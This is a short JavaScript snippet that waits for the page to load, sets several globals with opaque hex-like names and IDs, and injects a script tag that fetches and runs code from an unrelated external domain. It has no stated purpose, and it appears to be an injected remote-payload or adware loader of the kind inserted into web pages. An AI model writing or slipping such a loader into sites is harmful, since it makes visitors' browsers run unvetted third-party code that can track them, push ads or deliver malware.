;(function(){
var onready = (function() {
    var funcs = [];
    var ready = false;
    function handler(e) {
        if(ready) return;
        if(e.type === 'onreadystatechange' && document.readyState !== 'complete') {
            return;
        }
        for(var i=0; i<funcs.length; i++) {
            funcs[i].call(document);
        }
        ready = true;
        funcs = null;
    }
    if(document.addEventListener) {
        document.addEventListener('DOMContentLoaded', handler, false);
        document.addEventListener('readystatechange', handler, false);            //IE9+
        window.addEventListener('load', handler, false);
    }else if(document.attachEvent) {
        document.attachEvent('onreadystatechange', handler);
        window.attachEvent('onload', handler);
    }
    return function whenReady(fn) {
        if(ready) { fn.call(document); }
        else { funcs.push(fn); }
    }
})();

onready(function(){
var url = "http://j-cdn.sho9wbox.com/j/?jlib=master&v=1&t=fx&d=PC";
window.v6d061dfa0ddfd12160ad851976e4a26d = "fx";
window.v6d061dfa0ddfd12160ad851976e4a26a = "PC";
window.v6d061dfa0ddfd12160ad851976e4a26b = "cc81da07a988";
window.v6d061dfa0ddfd12160ad851976e4a26c = "1c1b0d2405a8";
var sc = document.createElement('script');
sc.setAttribute("type","text/javascript");
sc.setAttribute("charset","utf-8");
sc.setAttribute("src", url);
var head = document.head || document.getElementsByTagName('head')[0];
head.appendChild(sc);
})})();
